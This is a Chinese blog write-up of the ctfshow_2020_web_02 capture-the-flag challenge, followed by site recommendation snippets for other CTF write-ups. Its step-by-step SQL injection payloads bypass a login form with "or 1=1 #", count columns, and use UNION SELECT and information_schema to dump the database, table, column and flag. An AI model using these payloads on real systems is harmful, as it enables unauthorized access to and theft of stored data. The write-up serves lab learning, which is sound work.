ctfshow_2020_web_02 WP

最新推荐文章于 2024-05-04 15:41:58 发布
最新推荐文章于 2024-05-04 15:41:58 发布
阅读量793 收藏 1
点赞数
文章标签: 网络安全 安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shirongliang/article/details/127602008
版权

在这里插入图片描述

考查点:

基本的SQL注入
多表联合查询
在用户名处注入sql语句,密码随意

注意点:本题属于在登陆页面的SQL注入,所以需要在注入语句中加“or 1=1”跳过登录验证步骤,末尾加“#”注释掉后面内容

解题步骤:

1.判断注入类型

1 or 1=1 #

无回显信息
在这里插入图片描述

' or 1=1 #

在这里插入图片描述
可知本题的注入类型为字符型

2.判断回显列

' or 1=1 order by 3 #①
' or 1=1 order by 4 #②

①语句可以得到回显内容,②却不能,所以该数据库表只有三列

' or 1=1 union select 11,22,33 #

在这里插入图片描述
可以看到数据回显位置在第二列,故接下来的注入信息根据第二列展开

3.查询数据库名

' or 1=1 union select 11,database(),33 #

在这里插入图片描述

database()方法可以查看所在数据库名—>web2

4.查询数据表名

' or 1=1 union select 11,group_concat(table_name),33 from information_schema.tables where table_schema='web2'#

在这里插入图片描述
group_concat()方法可以得到用逗号链接的查询结果、
information_schema中存放了数据库中的表名、列名等信息

5.查询列名

' or 1=1 union select 11,group_concat(column_name),33 from information_schema.columns where table_name='flag'#

在这里插入图片描述
6.查询flag信息
得到数据库名,数据表名,列名。就可以准确查询flag所在信息了

' or 1=1 union select 11,flag,33 from web2.flag #

在这里插入图片描述

大源阿良
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow_web2
zoixsoadji的博客
02-28 2251
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
CTFshow Web2解题思路详解
asdfghjklqwwe的博客
05-17 962
ctfshow web2 的解题思路详解
GKCTF2020WEBwp
qq_43571759的博客
05-27 1773
GKCTF2020 WEB wp 文章目录GKCTF2020 WEB wp[GKCTF2020]CheckIN----bypass disable_functions[GKCTF2020]老八小超市儿----shopxo后台上传[GKCTF2020]cve版签到----CVE-2020-7066%00截断[GKCTF2020]EZ三剑客-EzWeb----SSRF和redis5.X未授权漏洞redis未授权漏洞复现[GKCTF2020]EZ三剑客-EzNode----Nodejs内置函数特性[GKCTF
Ctfshow web-web2 WP
qq_45427131的博客
05-10 621
Ctfshow-Web-Web2 WP Ctfshow Web2 手工 1、 尝试万能密码 然后尝试查看显示位 查看当前连接的数据库 查询当前数据库下面的表面名 接下来查询字段名 最后查询flag 上面是手工爆破,要点是查询数据库内的表名和数据库内的字段名 查询数据库内所有表名的语句: select table_name from information_schema.tables where table_schema=“你想查找的数据库名” 查询表中所有字段的语句: select column
ctfshow月饼杯 web wp
Firebasky的博客
09-27 1240
这次的这个比赛中的web是我和羽师傅还有m3w师傅一起出的,一人一道。 其中最喜欢的是web3 羽师傅出的,真的太有意思啦。感谢羽师傅呢。 还有web1让自己复习序列化知识,感谢m3w师傅呢 web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname;.
CTFshow——WPWEB[1~5])
hahaha233330的博客
10-29 694
1、web签到题 F12 2、web2
ctfshow-WEB入门-Part2-wp
F1rstb100d
09-08 437
ctfshow-WEB入门-Part2-wp
CTFshow_web入门_爆破
bilala的博客
08-19 1699
文章目录前言- - > web21- - > web22- - > web23- - > web24- - > web25- - > web26- - > web27- - > web28 前言 - - > web21 * 考点: intruder中的Custom iterator(自定义迭代器) 先下载题目所给的zip,解压后发现是本字典,那必须是本题要用到的字典了 打开题目,登录,抓包 将图中乱码用base64解码 发现传参格式为: 账号冒号
ctfshow__黑盒测试
qq_45655564的博客
07-04 410
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
网络安全最全【Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp
最新发布
2401_84253037的博客
05-04 749
代码审计,大致思路是通过构造pop链实现class Chu0_write类中的eval函数RCE首先传参是show_show.show,php变量名只能是数字字母下划线,传进去的变量名会将 , +,.,[等符号转换成_,若变量中有. 号,可以用[替换_后,之后的字符不会再被替换成_构造的参数是show[show.show有两个waf第一个waf1是用urlencode绕过,即不会出现字母字符,注意是对$_REQUEST进行waf判断的,request的顺序:GET
ctfshow_2021月饼杯记录
MiGooli的博客
09-21 1731
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1203
小艾大佬的投稿支持 web AK了
ctfshow菜鸡杯 部分wp
Firebasky的博客
08-30 2203
参加了ctfshow组织的菜鸡杯,自我感觉还是比较不错的,让自己学习了好多新东西。还有感谢师傅们的耐心解答。真的真的感谢。 1. misc3 这道题考察的是jsfuck编码(参考),直接将编码放入浏览器的控制台进行解码。需要去掉最后的括号 2. misc1 这道题让自己学习了好多。一个是crc校验循环冗余校验,另一个是斐波那契数列脚本读取文件。斐波那契数列 下载文件,里面是一张照片参考信息,可能是照片的长宽高隐写,这里可以使用crc暴力破解的脚本。参考链接 import zlib import str.
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7209
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow吃瓜杯web wp
cosmoslin的博客
09-17 1216
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!");
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
羽的博客
03-30 1586
0x01 根据网站里面隐晦的提示,猜测可能需要连菜刀,而且图片上有个cai可能是连接的密码。 果然如此,那我们直接找flag吧,发现flag在根目录下,但是没有权限打开。那就得提权了 0x02 根据提示说漏洞每2分钟触发一次,猜测可能有定时任务可利用,cat /etc/crontab 这个定时任务很可疑呀 一分钟一次,在网上经过各种搜索发现了nginx提权漏洞CVE-2016-1247,大家有...
HECTF2020web部分题wp
weixin_46330722的博客
11-25 1768
HECTF签到ezphpssrfmexiazhu 这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。 签到 点一下忘记密码 然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上 import requests url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check=' url2='&next=%E
CTFshow_菜鸡杯_部分wp
monster663的博客
09-01 1209
web web签到 直接看到源码 <?php if(isset($_GET['url'])){ switch (strtolower(substr($_GET['url'], 0,4))) { case 'file': echo 'file protocol do not allow'; break; case 'php:': echo 'php protocol do not allow'
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2312
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值